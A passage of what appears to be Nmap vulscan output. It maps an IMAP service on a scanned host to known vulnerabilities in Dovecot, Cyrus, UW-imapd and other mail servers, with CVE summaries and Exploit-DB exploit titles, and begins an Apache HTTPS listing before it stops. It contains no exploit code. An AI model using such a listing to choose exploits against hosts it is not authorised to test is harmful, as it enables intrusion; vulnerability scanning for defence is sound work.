11628| [CVE-2007-6598] Dovecot before 1.0.10, with certain configuration options including use of %variables, does not properly maintain the LDAP+auth cache, which might allow remote authenticated users to login as a different user who has the same password.
11629| [CVE-2007-5794] Race condition in nss_ldap, when used in applications that are linked against the pthread library and fork after a call to nss_ldap, might send user data to the wrong process because of improper handling of the LDAP connection. NOTE: this issue was originally reported for Dovecot with the wrong mailboxes being returned, but other applications might also be affected.
11630| [CVE-2007-5740] The format string protection mechanism in IMAPD for Perdition Mail Retrieval Proxy 1.17 and earlier allows remote attackers to execute arbitrary code via an IMAP tag with a null byte followed by a format string specifier, which is not counted by the mechanism.
11631| [CVE-2007-5018] Stack-based buffer overflow in IMAPD in Mercury/32 4.52 allows remote authenticated users to execute arbitrary code via a long argument in a SEARCH ON command. NOTE: this issue might overlap with CVE-2004-1211.
11632| [CVE-2007-4211] The ACL plugin in Dovecot before 1.0.3 allows remote authenticated users with the insert right to save certain flags via a (1) COPY or (2) APPEND command.
11633| [CVE-2007-3925] Multiple buffer overflows in the IMAP service (imapd32.exe) in Ipswitch IMail Server 2006 before 2006.21 allow remote authenticated users to execute arbitrary code via the (1) Search or (2) Search Charset command.
11634| [CVE-2007-2231] Directory traversal vulnerability in index/mbox/mbox-storage.c in Dovecot before 1.0.rc29, when using the zlib plugin, allows remote attackers to read arbitrary gzipped (.gz) mailboxes (mbox files) via a .. (dot dot) sequence in the mailbox name.
11635| [CVE-2007-2173] Eval injection vulnerability in (1) courier-imapd.indirect and (2) courier-pop3d.indirect in Courier-IMAP before 4.0.6-r2, and 4.1.x before 4.1.2-r1, on Gentoo Linux allows remote attackers to execute arbitrary commands via the XMAILDIR variable, related to the LOGINRUN variable.
11636| [CVE-2007-1579] Stack-based buffer overflow in Atrium MERCUR IMAPD allows remote attackers to have an unknown impact via a certain SUBSCRIBE command.
11637| [CVE-2007-1578] Multiple integer signedness errors in the NTLM implementation in Atrium MERCUR IMAPD (mcrimap4.exe) 5.00.14, with SP4, allow remote attackers to execute arbitrary code via a long NTLMSSP argument that triggers a stack-based buffer overflow.
11638| [CVE-2007-0618] Unspecified vulnerability in (1) pop3d, (2) pop3ds, (3) imapd, and (4) imapds in IBM AIX 5.3.0 has unspecified impact and attack vectors, involving an "authentication vulnerability."
11639| [CVE-2006-6762] The IMAP daemon (IMAPD) in Novell NetMail before 3.52e FTF2 allows remote authenticated users to cause a denial of service via an APPEND command with a single "(" (parenthesis) in the argument.
11640| [CVE-2006-6761] Stack-based buffer overflow in the IMAP daemon (IMAPD) in Novell NetMail before 3.52e FTF2 allows remote authenticated users to execute arbitrary code via a long argument to the SUBSCRIBE command.
11641| [CVE-2006-6425] Stack-based buffer overflow in the IMAP daemon (IMAPD) in Novell NetMail before 3.52e FTF2 allows remote authenticated users to execute arbitrary code via unspecified vectors involving the APPEND command.
11642| [CVE-2006-6424] Multiple buffer overflows in Novell NetMail before 3.52e FTF2 allow remote attackers to execute arbitrary code (1) by appending literals to certain IMAP verbs when specifying command continuation requests to IMAPD, resulting in a heap overflow
11643| [CVE-2006-5973] Off-by-one buffer overflow in Dovecot 1.0test53 through 1.0.rc14, and possibly other versions, when index files are used and mmap_disable is set to "yes," allows remote authenticated IMAP or POP3 users to cause a denial of service (crash) via unspecified vectors involving the cache file.
11644| [CVE-2006-2502] Stack-based buffer overflow in pop3d in Cyrus IMAPD (cyrus-imapd) 2.3.2, when the popsubfolders option is enabled, allows remote attackers to execute arbitrary code via a long USER command.
11645| [CVE-2006-2414] Directory traversal vulnerability in Dovecot 1.0 beta and 1.0 allows remote attackers to list files and directories under the mbox parent directory and obtain mailbox names via ".." sequences in the (1) LIST or (2) DELETE IMAP command.
11646| [CVE-2006-0730] Multiple unspecified vulnerabilities in Dovecot before 1.0beta3 allow remote attackers to cause a denial of service (application crash or hang) via unspecified vectors involving (1) "potential hangs" in the APPEND command and "potential crashes" in (2) dovecot-auth and (3) imap/pop3-login. NOTE: vector 2 might be related to a double free vulnerability.
11647| [CVE-2005-2278] Stack-based buffer overflow in the IMAP daemon (imapd) in MailEnable Professional 1.54 allows remote authenticated users to execute arbitrary code via the status command with a long mailbox name.
11648| [CVE-2005-1256] Stack-based buffer overflow in the IMAP daemon (IMAPD32.EXE) in IMail 8.13 in Ipswitch Collaboration Suite (ICS), and other versions before IMail Server 8.2 Hotfix 2, allows remote authenticated users to execute arbitrary code via a STATUS command with a long mailbox name.
11649| [CVE-2005-1249] The IMAP daemon (IMAPD32.EXE) in Ipswitch Collaboration Suite (ICS) allows remote attackers to cause a denial of service (CPU consumption) via an LSUB command with a large number of null characters, which causes an infinite loop.
11650| [CVE-2005-1015] Buffer overflow in MailEnable Imapd (MEIMAP.exe) allows remote attackers to execute arbitrary code via a long LOGIN command.
11651| [CVE-2005-0546] Multiple buffer overflows in Cyrus IMAPd before 2.2.11 may allow attackers to execute arbitrary code via (1) an off-by-one error in the imapd annotate extension, (2) an off-by-one error in "cached header handling," (3) a stack-based buffer overflow in fetchnews, or (4) a stack-based buffer overflow in imapd.
11652| [CVE-2003-1322] Multiple stack-based buffer overflows in Atrium MERCUR IMAPD in MERCUR Mailserver before 4.2.15.0 allow remote attackers to execute arbitrary code via a long (1) EXAMINE, (2) DELETE, (3) SUBSCRIBE, (4) RENAME, (5) UNSUBSCRIBE, (6) LIST, (7) LSUB, (8) STATUS, (9) LOGIN, (10) CREATE, or (11) SELECT command.
11653| [CVE-2002-1782] The default configuration of University of Washington IMAP daemon (wu-imapd), when running on a system that does not allow shell access, allows a local user with a valid IMAP account to read arbitrary files as that user.
11654| [CVE-2002-1604] Multiple buffer overflows in HP Tru64 UNIX allow local and possibly remote attackers to execute arbitrary code via a long NLSPATH environment variable to (1) csh, (2) dtsession, (3) dxsysinfo, (4) imapd, (5) inc, (6) uucp, (7) uux, (8) rdist, or (9) deliver.
11655| [CVE-2002-0997] Buffer overflows in IMAP Agent (imapd) for Novell NetMail (NIMS) 3.0.3 before 3.0.3A allows remote attackers to cause a denial of service.
11656| [CVE-2002-0379] Buffer overflow in University of Washington imap server (uw-imapd) imap-2001 (imapd 2001.315) and imap-2001a (imapd 2001.315) with legacy RFC 1730 support, and imapd 2000.287 and earlier, allows remote authenticated users to execute arbitrary code via a long BODY request.
11657| [CVE-2001-0691] Buffer overflows in Washington University imapd 2000a through 2000c could allow local users without shell access to execute code as themselves in certain configurations.
11658| [CVE-2000-0284] Buffer overflow in University of Washington imapd version 4.7 allows users with a valid account to execute commands via LIST or other commands.
11659| [CVE-1999-1557] Buffer overflow in the login functions in IMAP server (imapd) in Ipswitch IMail 5.0 and earlier allows remote attackers to cause a denial of service and possibly execute arbitrary code via (1) a long user name or (2) a long password.
11660| [CVE-1999-1445] Vulnerability in imapd and ipop3d in Slackware 3.4 and 3.3 with shadowing enabled, and possibly other operating systems, allows remote attackers to cause a core dump via a short sequence of USER and PASS commands that do not provide valid usernames or passwords.
11661| [CVE-1999-1224] IMAP 4.1 BETA, and possibly other versions, does not properly handle the SIGABRT (abort) signal, which allows local users to crash the server (imapd) via certain sequences of commands, which causes a core dump that may contain sensitive password information.
11662|
11663| SecurityFocus - https://www.securityfocus.com/bid/:
11664| [103201] Dovecot CVE-2017-14461 Out-Of-Bounds Read Information Disclosure Vulnerability
11665| [97536] Dovecot CVE-2017-2669 Denial of Service Vulnerability
11666| [94639] Dovecot Auth Component CVE-2016-8652 Denial of Service Vulnerability
11667| [91175] Dovecot CVE-2016-4982 Local Information Disclosure Vulnerability
11668| [84736] Dovecot CVE-2008-4870 Local Security Vulnerability
11669| [84478] imapd CVE-1999-1224 Denial-Of-Service Vulnerability
11670| [74335] Dovecot 'ssl-proxy-openssl.c' Remote Denial of Service Vulnerability
11671| [67306] Dovecot Denial of Service Vulnerability
11672| [65650] Eudora WorldMail imapd 'UID' Command Buffer Overflow Vulnerability
11673| [63367] Dovecot Checkpassword Authentication Protocol Local Authentication Bypass Vulnerability
11674| [61763] RETIRED: Dovecot 'LIST' Command Denial of Service Vulnerability
11675| [60465] Exim for Dovecot 'use_shell' Remote Command Execution Vulnerability
11676| [60052] Dovecot 'APPEND' Parameter Denial of Service Vulnerability
11677| [56759] RETIRED: Dovecot 'mail-search.c' Denial of Service Vulnerability
11678| [51403] Eudora WorldMail imapd 'LIST' Command Buffer Overflow Vulnerability
11679| [50709] Dovecot SSL Certificate 'Common Name' Field Validation Security Bypass Vulnerability
11680| [49949] Cyrus IMAPd NTTP Logic Error Authentication Bypass Vulnerability
11681| [48003] Dovecot 'script-login' Multiple Security Bypass Vulnerabilities
11682| [47930] Dovecot Header Name NULL Character Denial of Service Vulnerability
11683| [44874] Apple Mac OS X Dovecot (CVE-2010-4011) Memory Corruption Vulnerability
11684| [43690] Dovecot Access Control List (ACL) Multiple Remote Vulnerabilities
11685| [41964] Dovecot Access Control List (ACL) Plugin Security Bypass Weakness
11686| [39258] Dovecot Service Control Access List Security Bypass Vulnerability
11687| [37084] Dovecot Insecure 'base_dir' Permissions Local Privilege Escalation Vulnerability
11688| [36377] Dovecot Sieve Plugin Multiple Unspecified Buffer Overflow Vulnerabilities
11689| [32582] Dovecot ManageSieve Service '.sieve' Files Directory Traversal Vulnerability
11690| [31997] Dovecot Invalid Message Address Parsing Denial of Service Vulnerability
11691| [31587] Dovecot ACL Plugin Multiple Security Bypass Vulnerabilities
11692| [28181] Dovecot 'Tab' Character Password Check Security Bypass Vulnerability
11693| [28092] Dovecot 'mail_extra_groups' Insecure Settings Local Unauthorized Access Vulnerability
11694| [27093] Dovecot Authentication Cache Security Bypass Vulnerability
11695| [26270] Perdition IMAPD __STR_VWRITE Remote Format String Vulnerability
11696| [25733] Mercury/32 IMAPD SEARCH Command Remote Stack Buffer Overflow Vulnerability
11697| [25182] Dovecot ACL Plugin Security Bypass Vulnerability
11698| [23552] Dovecot Zlib Plugin Remote Information Disclosure Vulnerability
11699| [23058] Atrium Mercur IMapD NTLM Buffer Overflow Vulnerability
11700| [22262] IBM AIX Pop3D/Pop3DS/IMapD/IMapDS Authentication Bypass Vulnerability
11701| [21183] Dovecot IMAP Server Mapped Pages Off-By-One Buffer Overflow Vulnerability
11702| [18056] Cyrus IMAPD POP3D Remote Buffer Overflow Vulnerability
11703| [17961] Dovecot Remote Information Disclosure Vulnerability
11704| [16672] Dovecot Double Free Denial of Service Vulnerability
11705| [15980] Qualcomm WorldMail IMAPD Buffer Overflow Vulnerability
11706| [15753] Ipswitch Collaboration Suite and IMail Server IMAPD LIST Command Denial Of Service Vulnerability
11707| [12636] Cyrus IMAPD Multiple Remote Buffer Overflow Vulnerabilities
11708| [11738] Cyrus IMAPD Multiple Remote Unspecified Vulnerabilities
11709| [11729] Cyrus IMAPD Multiple Remote Vulnerabilities
11710| [6298] Cyrus IMAPD Pre-Login Heap Corruption Vulnerability
11711| [4713] Wu-imapd Partial Mailbox Attribute Remote Buffer Overflow Vulnerability
11712| [2856] Imapd 'Local' Buffer Overflow Vulnerabilities
11713| [1110] Univ. Of Washington imapd Buffer Overflow Vulnerabilities
11714| [502] NT IMail Imapd Buffer Overflow DoS Vulnerability
11715| [130] imapd Buffer Overflow Vulnerability
11716|
11717| IBM X-Force - https://exchange.xforce.ibmcloud.com:
11718| [86382] Dovecot POP3 Service denial of service
11719| [84396] Dovecot IMAP APPEND denial of service
11720| [80453] Dovecot mail-search.c denial of service
11721| [71354] Dovecot SSL Common Name (CN) weak security
11722| [70325] Cyrus IMAPd NNTP security bypass
11723| [67675] Dovecot script-login security bypass
11724| [67674] Dovecot script-login directory traversal
11725| [67589] Dovecot header name denial of service
11726| [63267] Apple Mac OS X Dovecot information disclosure
11727| [62340] Dovecot mailbox security bypass
11728| [62339] Dovecot IMAP or POP3 denial of service
11729| [62256] Dovecot mailbox security bypass
11730| [62255] Dovecot ACL entry security bypass
11731| [60639] Dovecot ACL plugin weak security
11732| [57267] Apple Mac OS X Dovecot Kerberos security bypass
11733| [56763] Dovecot header denial of service
11734| [54363] Dovecot base_dir privilege escalation
11735| [53248] CMU Sieve plugin for Dovecot unspecified buffer overflow
11736| [47526] UW-imapd rfc822_output_char() denial of service
11737| [46323] Dovecot dovecot.conf information disclosure
11738| [46227] Dovecot message parsing denial of service
11739| [45669] Dovecot ACL mailbox security bypass
11740| [45667] Dovecot ACL plugin rights security bypass
11741| [41085] Dovecot TAB characters authentication bypass
11742| [41009] Dovecot mail_extra_groups option unauthorized access
11743| [39342] Dovecot LDAP auth cache configuration security bypass
11744| [35767] Dovecot ACL plugin security bypass
11745| [34082] Dovecot mbox-storage.c directory traversal
11746| [30433] Dovecot IMAP/POP3 server dovecot.index.cache buffer overflow
11747| [26536] Dovecot IMAP LIST information disclosure
11748| [24710] Dovecot dovecot-auth and imap/pop3-login denial of service
11749| [24709] Dovecot APPEND command denial of service
11750| [22629] RHSA-2005:408 updates for cyrus-imapd not installed
11751| [19460] Cyrus IMAP imapd buffer overflow
11752| [19455] Cyrus IMAP imapd extension off-by-one buffer overflow
11753| [18492] Novell NetMail IMAPD 101_mEna buffer overflow
11754| [10803] UW IMAP (wu-imapd) authenticated user buffer overflow
11755| [9238] UW IMAP (wu-imapd) could allow a remote attacker to access arbitrary files
11756| [9055] UW IMAP (wu-imapd) partial mailbox attributes to request buffer overflow
11757| [7345] Slackware Linux imapd and ipop3d core dump
11758| [573] Imapd denial of service
11759|
11760| Exploit-DB - https://www.exploit-db.com:
11761| [30724] Perdition 1.17 IMAPD __STR_VWRITE Remote Format String Vulnerability
11762| [25297] Dovecot with Exim sender_address Parameter - Remote Command Execution
11763| [22061] Cyrus IMAPD 1.4/1.5.19/2.0.12/2.0.16/2.1.9/2.1.10 Pre-Login Heap Corruption Vulnerability
11764| [21443] Wu-imapd 2000/2001 Partial Mailbox Attribute Remote Buffer Overflow Vulnerability (2)
11765| [21442] Wu-imapd 2000/2001 Partial Mailbox Attribute Remote Buffer Overflow Vulnerability (1)
11766| [19849] UoW imapd 10.234/12.264 COPY Buffer Overflow (meta)
11767| [19848] UoW imapd 10.234/12.264 LSUB Buffer Overflow (meta)
11768| [19847] UoW imapd 10.234/12.264 Buffer Overflow Vulnerabilities
11769| [19377] Ipswitch IMail 5.0 Imapd Buffer Overflow DoS Vulnerability
11770| [19107] Netscape Messaging Server 3.55,University of Washington imapd 10.234 Buffer Overflow Vulnerability
11771| [18354] WorldMail imapd 3.0 SEH overflow (egg hunter)
11772| [16836] Cyrus IMAPD pop3d popsubfolders USER Buffer Overflow
11773| [16485] MailEnable IMAPD 1.54 - STATUS Request Buffer Overflow
11774| [16482] MDaemon 9.6.4 IMAPD FETCH Buffer Overflow
11775| [16480] MailEnable IMAPD W3C Logging Buffer Overflow
11776| [16477] Mdaemon 8.0.3 IMAPD CRAM-MD5 Authentication Overflow
11777| [16475] MailEnable IMAPD (2.35) Login Request Buffer Overflow
11778| [16474] Qualcomm WorldMail 3.0 IMAPD LIST Buffer Overflow
11779| [5257] Dovecot IMAP 1.0.10 <= 1.1rc2 - Remote Email Disclosure Exploit
11780| [4429] Mercury/32 4.52 IMAPD SEARCH command Post-Auth Overflow Exploit
11781| [3627] IPSwitch IMail Server <= 8.20 IMAPD Remote Buffer Overflow Exploit
11782| [3527] Mercur IMAPD 5.00.14 Remote Denial of Service Exploit (win32)
11783| [2185] Cyrus IMAPD 2.3.2 (pop3d) Remote Buffer Overflow Exploit (3)
11784| [2053] Cyrus IMAPD 2.3.2 (pop3d) Remote Buffer Overflow Exploit (2)
11785| [1813] Cyrus IMAPD 2.3.2 (pop3d) Remote Buffer Overflow Exploit
11786| [1380] Eudora Qualcomm WorldMail 3.0 (IMAPd) Remote Overflow Exploit
11787| [1332] MailEnable 1.54 Pro Universal IMAPD W3C Logging BoF Exploit
11788| [1327] FTGate4 Groupware Mail Server 4.1 (imapd) Remote Buffer Overflow PoC
11789| [1151] MDaemon 8.0.3 IMAPD CRAM-MD5 Authentication Overflow Exploit
11790| [1124] IPSwitch IMail Server <= 8.15 IMAPD Remote Root Exploit
11791| [915] MailEnable Enterprise 1.x Imapd Remote Exploit
11792| [903] Cyrus imapd 2.2.4 - 2.2.8 (imapmagicplus) Remote Exploit
11793| [340] Linux imapd Remote Overflow File Retrieve Exploit
11794|
11795| OpenVAS (Nessus) - http://www.openvas.org:
11796| [901026] Dovecot Sieve Plugin Multiple Buffer Overflow Vulnerabilities
11797| [901025] Dovecot Version Detection
11798| [881425] CentOS Update for cyrus-imapd CESA-2011:1508 centos5 x86_64
11799| [881403] CentOS Update for cyrus-imapd CESA-2011:0859 centos5 x86_64
11800| [881402] CentOS Update for dovecot CESA-2011:1187 centos5 x86_64
11801| [881397] CentOS Update for cyrus-imapd CESA-2011:1317 centos4 x86_64
11802| [881370] CentOS Update for cyrus-imapd CESA-2011:1508 centos4 x86_64
11803| [881358] CentOS Update for dovecot CESA-2011:1187 centos4 x86_64
11804| [881318] CentOS Update for cyrus-imapd CESA-2011:0859 centos4 x86_64
11805| [881255] CentOS Update for cyrus-imapd CESA-2011:1317 centos5 x86_64
11806| [881050] CentOS Update for cyrus-imapd CESA-2011:1508 centos5 i386
11807| [881049] CentOS Update for cyrus-imapd CESA-2011:1508 centos4 i386
11808| [881007] CentOS Update for cyrus-imapd CESA-2011:1317 centos5 i386
11809| [880980] CentOS Update for dovecot CESA-2011:1187 centos5 i386
11810| [880978] CentOS Update for cyrus-imapd CESA-2011:1317 centos4 i386
11811| [880967] CentOS Update for dovecot CESA-2011:1187 centos4 i386
11812| [880958] CentOS Update for cyrus-imapd CESA-2011:0859 centos4 i386
11813| [880905] CentOS Update for cyrus-imapd CESA-2009:1459 centos4 i386
11814| [880864] CentOS Update for cyrus-imapd CESA-2009:1459 centos5 i386
11815| [880826] CentOS Update for cyrus-imapd CESA-2009:1116 centos5 i386
11816| [880536] CentOS Update for cyrus-imapd CESA-2011:0859 centos5 i386
11817| [870607] RedHat Update for dovecot RHSA-2011:0600-01
11818| [870520] RedHat Update for cyrus-imapd RHSA-2011:1508-01
11819| [870489] RedHat Update for cyrus-imapd RHSA-2011:1317-01
11820| [870471] RedHat Update for dovecot RHSA-2011:1187-01
11821| [870443] RedHat Update for cyrus-imapd RHSA-2011:0859-01
11822| [870153] RedHat Update for dovecot RHSA-2008:0297-02
11823| [864075] Fedora Update for cyrus-imapd FEDORA-2011-13832
11824| [863585] Fedora Update for cyrus-imapd FEDORA-2011-13869
11825| [863579] Fedora Update for cyrus-imapd FEDORA-2011-13860
11826| [863281] Fedora Update for cyrus-imapd FEDORA-2011-7193
11827| [863273] Fedora Update for cyrus-imapd FEDORA-2011-7217
11828| [863272] Fedora Update for dovecot FEDORA-2011-7612
11829| [863115] Fedora Update for dovecot FEDORA-2011-7258
11830| [861525] Fedora Update for dovecot FEDORA-2007-664
11831| [861394] Fedora Update for dovecot FEDORA-2007-493
11832| [861333] Fedora Update for dovecot FEDORA-2007-1485
11833| [860845] Fedora Update for dovecot FEDORA-2008-9202
11834| [860663] Fedora Update for dovecot FEDORA-2008-2475
11835| [860169] Fedora Update for dovecot FEDORA-2008-2464
11836| [860089] Fedora Update for dovecot FEDORA-2008-9232
11837| [840950] Ubuntu Update for dovecot USN-1295-1
11838| [840668] Ubuntu Update for dovecot USN-1143-1
11839| [840583] Ubuntu Update for dovecot vulnerabilities USN-1059-1
11840| [840335] Ubuntu Update for dovecot vulnerabilities USN-593-1
11841| [840290] Ubuntu Update for dovecot vulnerability USN-567-1
11842| [840234] Ubuntu Update for dovecot vulnerability USN-666-1
11843| [840072] Ubuntu Update for dovecot vulnerability USN-487-1
11844| [831590] Mandriva Update for cyrus-imapd MDVSA-2012:037 (cyrus-imapd)
11845| [831468] Mandriva Update for cyrus-imapd MDVSA-2011:149 (cyrus-imapd)
11846| [831410] Mandriva Update for cyrus-imapd MDVSA-2011:100 (cyrus-imapd)
11847| [831405] Mandriva Update for dovecot MDVSA-2011:101 (dovecot)
11848| [831230] Mandriva Update for dovecot MDVSA-2010:217 (dovecot)
11849| [831207] Mandriva Update for cyrus-imapd MDVA-2010:208 (cyrus-imapd)
11850| [831197] Mandriva Update for dovecot MDVSA-2010:196 (dovecot)
11851| [831054] Mandriva Update for dovecot MDVSA-2010:104 (dovecot)
11852| [830496] Mandriva Update for dovecot MDVSA-2008:232 (dovecot)
11853| [801055] Dovecot 'base_dir' Insecure Permissions Security Bypass Vulnerability
11854| [800149] UW-imapd tmail and dmail BOF Vulnerabilities (Linux)
11855| [800030] Dovecot ACL Plugin Security Bypass Vulnerabilities
11856| [70767] Gentoo Security Advisory GLSA 201110-04 (Dovecot)
11857| [70696] Debian Security Advisory DSA 2377-1 (cyrus-imapd-2.2)
11858| [70407] Debian Security Advisory DSA 2318-1 (cyrus-imapd-2.2)
11859| [70259] FreeBSD Ports: dovecot
11860| [69965] Debian Security Advisory DSA 2258-1 (kolab-cyrus-imapd)
11861| [69959] Debian Security Advisory DSA 2252-1 (dovecot)
11862| [69740] Debian Security Advisory DSA 2242-1 (cyrus-imapd-2.2)
11863| [66522] FreeBSD Ports: dovecot
11864| [66416] Mandriva Security Advisory MDVSA-2009:229-1 (cyrus-imapd)
11865| [66233] SLES10: Security update for Cyrus IMAPD
11866| [66226] SLES11: Security update for Cyrus IMAPD
11867| [66222] SLES9: Security update for Cyrus IMAPD
11868| [65938] SLES10: Security update for Cyrus IMAPD
11869| [65723] SLES11: Security update for Cyrus IMAPD
11870| [65523] SLES9: Security update for Cyrus IMAPD
11871| [65479] SLES9: Security update for cyrus-imapd
11872| [65094] SLES9: Security update for cyrus-imapd
11873| [65010] Ubuntu USN-838-1 (dovecot)
11874| [64989] CentOS Security Advisory CESA-2009:1459 (cyrus-imapd)
11875| [64978] Debian Security Advisory DSA 1892-1 (dovecot)
11876| [64977] Debian Security Advisory DSA 1893-1 (cyrus-imapd-2.2 kolab-cyrus-imapd)
11877| [64965] Fedora Core 11 FEDORA-2009-9901 (cyrus-imapd)
11878| [64963] Fedora Core 10 FEDORA-2009-9869 (cyrus-imapd)
11879| [64953] Mandrake Security Advisory MDVSA-2009:242-1 (dovecot)
11880| [64952] Mandrake Security Advisory MDVSA-2009:242 (dovecot)
11881| [64898] FreeBSD Ports: cyrus-imapd
11882| [64864] Debian Security Advisory DSA 1881-1 (cyrus-imapd-2.2)
11883| [64861] Fedora Core 10 FEDORA-2009-9559 (dovecot)
11884| [64847] Fedora Core 10 FEDORA-2009-9428 (cyrus-imapd)
11885| [64846] Fedora Core 11 FEDORA-2009-9417 (cyrus-imapd)
11886| [64838] Mandrake Security Advisory MDVSA-2009:229 (cyrus-imapd)
11887| [64271] CentOS Security Advisory CESA-2009:1116 (cyrus-imapd)
11888| [62965] Gentoo Security Advisory GLSA 200812-16 (dovecot)
11889| [62854] FreeBSD Ports: dovecot-managesieve
11890| [61916] FreeBSD Ports: dovecot
11891| [60588] Gentoo Security Advisory GLSA 200803-25 (dovecot)
11892| [60568] Debian Security Advisory DSA 1516-1 (dovecot)
11893| [60528] FreeBSD Ports: dovecot
11894| [60134] Debian Security Advisory DSA 1457-1 (dovecot)
11895| [60089] FreeBSD Ports: dovecot
11896| [58578] Debian Security Advisory DSA 1359-1 (dovecot)
11897| [56834] Debian Security Advisory DSA 1080-1 (dovecot)
11898| [55807] Slackware Advisory SSA:2005-310-06 imapd
11899| [54861] Gentoo Security Advisory GLSA 200502-29 (cyrus-imapd)
11900| [54755] Gentoo Security Advisory GLSA 200411-34 (cyrus-imapd)
11901| [53739] Debian Security Advisory DSA 215-1 (cyrus-imapd)
11902| [53288] Debian Security Advisory DSA 597-1 (cyrus-imapd)
11903| [52297] FreeBSD Ports: cyrus-imapd
11904| [52296] FreeBSD Ports: cyrus-imapd
11905| [52295] FreeBSD Ports: cyrus-imapd
11906| [52294] FreeBSD Ports: cyrus-imapd
11907| [52172] FreeBSD Ports: cyrus-imapd
11908|
11909| SecurityTracker - https://www.securitytracker.com:
11910| [1028585] Dovecot APPEND Parameter Processing Flaw Lets Remote Authenticated Users Deny Service
11911| [1024740] Mac OS X Server Dovecot Memory Aliasing Bug May Cause Mail to Be Delivered to the Wrong User
11912| [1017288] Dovecot POP3/IMAP Cache File Buffer Overflow May Let Remote Users Execute Arbitrary Code
11913| [1013278] Cyrus IMAPd Buffer Overflows in Annotate Extension, Cached Header, and Fetchnews May Let Remote Users Execute Arbitrary Code
11914|
11915| OSVDB - http://www.osvdb.org:
11916| [96172] Dovecot POP3 Service Terminated LIST Command Remote DoS
11917| [93525] Dovecot IMAP APPEND Command Malformed Parameter Parsing Remote DoS
11918| [93004] Dovecot with Exim sender_address Parameter Remote Command Execution
11919| [88058] Dovecot lib-storage/mail-search.c Multiple Keyword Search Handling Remote DoS
11920| [78304] Eudora WorldMail imapd SEH LIST Command Parsing Remote Overflow
11921| [77185] Dovecot SSL Certificate Common Name Field MitM Spoofing Weakness
11922| [75445] Cyrus IMAP Server imapd index.c index_get_ids Function References Header NULL Dereference Remote DoS
11923| [74515] Dovecot script-login chroot Configuration Setting Traversal Arbitrary File Access
11924| [74514] Dovecot script-login User / Group Configuration Settings Remote Access Restriction Bypass
11925| [72495] Dovecot lib-mail/message-header-parser.c Mail Header Name NULL Character Handling Remote DoS
11926| [69260] Apple Mac OS X Server Dovecot Memory Aliasing Mail Delivery Issue
11927| [68516] Dovecot plugins/acl/acl-backend-vfile.c ACL Permission Addition User Private Namespace Mailbox Access Restriction Remote Bypass
11928| [68515] Dovecot plugins/acl/acl-backend-vfile.c ACL Permission Addition Specific Entry Order Mailbox Access Restriction Remote Bypass
11929| [68513] Dovecot Non-public Namespace Mailbox ACL Manipulation Access Restriction Remote Bypass
11930| [68512] Dovecot IMAP / POP3 Session Disconnect Master Process Outage Remote DoS
11931| [66625] Dovecot ACL Plugin INBOX ACL Copying Weakness Restriction Bypass
11932| [66113] Dovecot Mail Root Directory Creation Permission Weakness
11933| [66112] Dovecot Installation base_dir Parent Directory Permission Weakness
11934| [66111] Dovecot SEARCH Functionality str_find_init() Function Overflow
11935| [66110] Dovecot Multiple Unspecified Buffer Overflows
11936| [66108] Dovecot Malformed Message Body Processing Unspecified Functions Remote DoS
11937| [64783] Dovecot E-mail Message Header Unspecified DoS
11938| [63372] Apple Mac OS X Dovecot Kerberos Authentication SACL Restriction Bypass
11939| [62796] Dovecot mbox Format Email Header Handling DoS
11940| [60316] Dovecot base_dir Directory Permission Weakness Local Privilege Escalation
11941| [58103] Dovecot CMU Sieve Plugin Script Handling Multiple Overflows
11942| [57843] Cyrus IMAP Server (cyrus-imapd) SIEVE Script Component (sieve/script.c) Crafted Script Handling Overflow
11943| [57681] UoW imap Server (uw-imapd) Arbitrary Remote File Access
11944| [52906] UW-imapd c-client Initial Request Remote Format String
11945| [52905] UW-imapd c-client Library RFC822BUFFER Routines rfc822_output_char Function Off-by-one
11946| [52456] UW-imapd on Debian Linux LOGIN Command Remote DoS
11947| [50253] Dovecot dovecot.conf Permission Weakness Local ssl_key_password Parameter Disclosure
11948| [49918] Dovecot ManageSieve Script Name Handling Traversal Arbitrary File Manipulation
11949| [49485] UW-imapd dmail Utility Mailbox Name Handling Overflow
11950| [49484] UW-imapd tmail Utility Mailbox Name Handling Overflow
11951| [49429] Dovecot Message Parsing Feature Crafted Email Header Handling Remote DoS
11952| [49099] Dovecot ACL Plugin k Right Mailbox Creation Restriction Bypass
11953| [49098] Dovecot ACL Plugin Negative Access Rights Bypass
11954| [43137] Dovecot mail_extra_groups Symlink File Manipulation
11955| [42979] Dovecot passdbs Argument Injection Authentication Bypass
11956| [42004] Perdition Mail Retrieval Proxy IMAPD IMAP Tag Remote Format String Arbitrary Code Execution
11957| [39876] Dovecot LDAP Auth Cache Security Bypass
11958| [39670] Mercury Mail Transport System IMAPD SEARCH Command Remote Overflow
11959| [39386] Dovecot ACL Plugin Insert Right APPEND / COPY Command Unauthorized Flag Manipulation
11960| [35489] Dovecot index/mbox/mbox-storage.c Traversal Arbitrary Gzip File Access
11961| [31362] Novell NetMail IMAP Daemon (IMAPD) APPEND Command Remote Overflow
11962| [31361] Novell NetMail IMAP Daemon (IMAPD) APPEND Command DoS
11963| [31360] Novell NetMail IMAP Daemon (IMAPD) SUBSCRIBE Command Remote Overflow
11964| [30524] Dovecot IMAP/POP3 Server dovecot.index.cache Handling Overflow
11965| [25853] Cyrus IMAPD pop3d USER Command Remote Overflow
11966| [25727] Dovecot Multiple Command Traversal Arbitrary Directory Listing
11967| [23281] Dovecot imap/pop3-login dovecot-auth DoS
11968| [23280] Dovecot Malformed APPEND Command DoS
11969| [18179] HP Tru64 UNIX imapd NLSPATH Environment Variable Local Overflow
11970| [13242] UW-imapd CRAM-MD5 Authentication Bypass
11971| [12385] Novell NetMail IMAPD 101_mEna Script Remote Overflow
11972| [12042] UoW imapd Multiple Unspecified Overflows
11973| [12037] UoW imapd (UW-IMAP) Multiple Command Remote Overflows
11974| [12033] Slackware Linux imapd/ipop3d Malformed USER/PASS Sequence DoS
11975| [911] UoW imapd AUTHENTICATE Command Remote Overflow
11976| [790] UoW imap Server (uw-imapd) BODY Request Remote Overflow
11977| [519] UoW imapd SIGABRT Signal Forced Crash Information Disclosure
11978|_
11979443/tcp open ssl/ssl Apache httpd (SSL-only mode)
11980|_http-server-header: Apache/2
11981| vulscan: VulDB - https://vuldb.com:
11982| [141649] Apache OFBiz up to 16.11.05 Form Widget Freemarker Markup Code Execution
11983| [141648] Apache OFBiz up to 16.11.05 Application Stored cross site scripting
11984| [140386] Apache Commons Beanutils 1.9.2 BeanIntrospector unknown vulnerability
11985| [139708] Apache Ranger up to 1.2.0 Policy Import cross site scripting
11986| [139540] cPanel up to 60.0.24 Apache HTTP Server Key information disclosure
11987| [139386] Apache Tike up to 1.21 RecursiveParserWrapper Stack-based memory corruption
